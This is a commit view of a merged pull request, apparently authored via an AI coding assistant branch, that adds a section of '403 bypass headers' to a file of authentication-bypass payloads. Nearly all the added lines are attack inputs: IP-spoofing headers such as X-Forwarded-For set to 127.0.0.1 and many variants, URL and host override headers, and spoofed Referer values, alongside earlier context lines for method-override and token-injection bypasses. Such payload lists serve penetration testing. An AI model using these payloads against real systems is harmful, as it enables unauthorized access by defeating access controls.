Merge pull request #17 from Stalin-143/copilot/add-proxy-headers

Add 403 bypass headers to authentication bypass payloads
2026-05-26 11:35:51 +00:00 · 2026-04-08 23:40:41 +05:30
parent 91477ae7a3 58af4e9e65
commit 8c19f31914
1 changed files with 51 additions and 0 deletions
@@ -451,3 +451,54 @@ postMessage({type:'auth',token:'admin_token'}, '*')
 X-HTTP-Method-Override: GET
 X-Method-Override: GET
 # Change POST to GET to bypass CSRF and auth checks
+
+# ============================================
+# 403 BYPASS HEADERS
+# ============================================
+
+# IP spoofing / access control bypass headers
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-For-Original: 127.0.0.1
+X-Forward-For: 127.0.0.1
+X-Forwarder-For: 127.0.0.1
+X-Forwarded: 127.0.0.1
+X-Forwarded-By: 127.0.0.1
+X-Forwarded-Host: 127.0.0.1
+X-Forwarded-Server: 127.0.0.1
+X-Forwarded-Scheme: https
+X-Forwarded-Scheme: http
+X-Forwarded-Port: 80
+X-Forwarded-Port: 443
+X-Forwarded-Port: 8080
+X-Forwarded-Port: 8443
+X-Client-IP: 127.0.0.1
+X-Real-Ip: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+X-Original-Remote-Addr: 127.0.0.1
+X-Originating-IP: 127.0.0.1
+X-True-IP: 127.0.0.1
+X-Custom-IP-Authorization: 127.0.0.1
+Client-IP: 127.0.0.1
+Real-Ip: 127.0.0.1
+
+# URL / host override headers
+X-Original-Url: 127.0.0.1
+X-Rewrite-Url: 127.0.0.1
+X-Http-Host-Override: 127.0.0.1
+X-Http-Destinationurl: 127.0.0.1
+X-Host: 127.0.0.1
+X-Proxy-Url: 127.0.0.1
+Proxy-Url: 127.0.0.1
+Proxy-Host: 127.0.0.1
+Http-Url: 127.0.0.1
+Base-Url: 127.0.0.1
+Url: 127.0.0.1
+Uri: 127.0.0.1
+Request-Uri: 127.0.0.1
+Redirect: 127.0.0.1
+
+# Referer / referrer spoofing
+Referer: 127.0.0.1
+Referrer: 127.0.0.1
+Refferer: 127.0.0.1